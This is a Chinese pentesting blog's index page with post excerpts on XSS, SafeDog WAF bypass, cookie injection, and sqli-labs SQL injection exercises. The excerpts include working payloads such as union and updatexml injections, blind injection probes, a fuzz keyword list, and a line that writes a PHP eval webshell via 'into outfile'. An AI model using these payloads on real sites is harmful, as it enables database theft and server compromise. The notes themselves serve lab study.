2022年12月28日

xss注入小节

摘要： error事件<img src="" onerror=alert(1)><script>alert(1)</script>() = ``\u003c \u003e固定网址加数字 onerror=alert(1)没有匹配换行符, 可以通过换行来绕过匹配表单无法逃避type="image" src=" 阅读全文

posted @ 2022-12-28 12:38 简单的小白渗透阅读(36) 评论(0) 推荐(0)

安全狗绕过

摘要：安全狗绕过的五种方法（一）内联注释(/*![12345]*/)绕过方法： /*!select*/: 相当于没有注释 /*!12345select*/: 当12345小于当前mysql版本号的时候，注释不生效，当大于版本号的时候注释生效。 /*![]*/: []中括号中的数字若填写则必须是5位（二阅读全文

posted @ 2022-12-28 12:37 简单的小白渗透阅读(888) 评论(0) 推荐(0)

Cookie注入新方法

摘要：判断一个网站是否支持cookie注入_> 现在是get ,你可以把参数放在post里面试试看看是否返回正常用hackbar插件也行或者用burp suite改包也行如果返回正常，说明支持cookie 接着把id=24放在cookie后面，并且用分号分隔开也是返回正常也可以在sqlmap里面跑阅读全文

posted @ 2022-12-28 10:56 简单的小白渗透阅读(135) 评论(0) 推荐(0)

2022年12月12日

sql-lib8-28

摘要： 8-22'or updatexml(1,concat(0x7e,(select database()),0x7e),1) or''or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.t 阅读全文

posted @ 2022-12-12 13:34 简单的小白渗透阅读(53) 评论(0) 推荐(0)

sql注入总汇

摘要：网址?id=10'union select 1,database(),3 -- qweupdatexml(1,concat(0x7e,(SELECT database()),0x7e),1)union select 1,"<?php eval($_REQUEST[8])?>",3 into outf 阅读全文

posted @ 2022-12-12 13:33 简单的小白渗透阅读(48) 评论(0) 推荐(0)

sql注入fuzz字典

摘要： length Length+handlerlikeLiKeselectSeleCT sleepSLEEpdatabaseDATABASedeletehavingoroRasAs-~BENCHMARKlimitLimItleftLeftselectSELECTinsertinsERTINSERTrig 阅读全文

posted @ 2022-12-12 13:31 简单的小白渗透阅读(953) 评论(0) 推荐(0)

2022年12月3日

sql-lab 8-17 盲注加post传参

摘要：布尔型盲注length() 函数返回字符串的长度?id=1' and (length(database()))=8 -- qwesubstr() 截取字符串（语法:SUBSTR(str,pos,len);） ?id=1' and (ascii(substr(database(),1,1)))=1 阅读全文

posted @ 2022-12-03 19:22 简单的小白渗透阅读(60) 评论(0) 推荐(0)

2022年11月30日

sql-lab 1-7

摘要：判断是否存在注入：?id=1' and 1=1 -- qwe 判断字段数：?id=1'order by 3-- qwe 判断显错位：?id=10'union select 1,2,3 -- qwe 判断库名：?id=10'union select 1,database(),3 -- limit0, 阅读全文

posted @ 2022-11-30 20:07 简单的小白渗透阅读(57) 评论(0) 推荐(0)

2022年12月28日

2022年12月12日

2022年12月3日

2022年11月30日

公告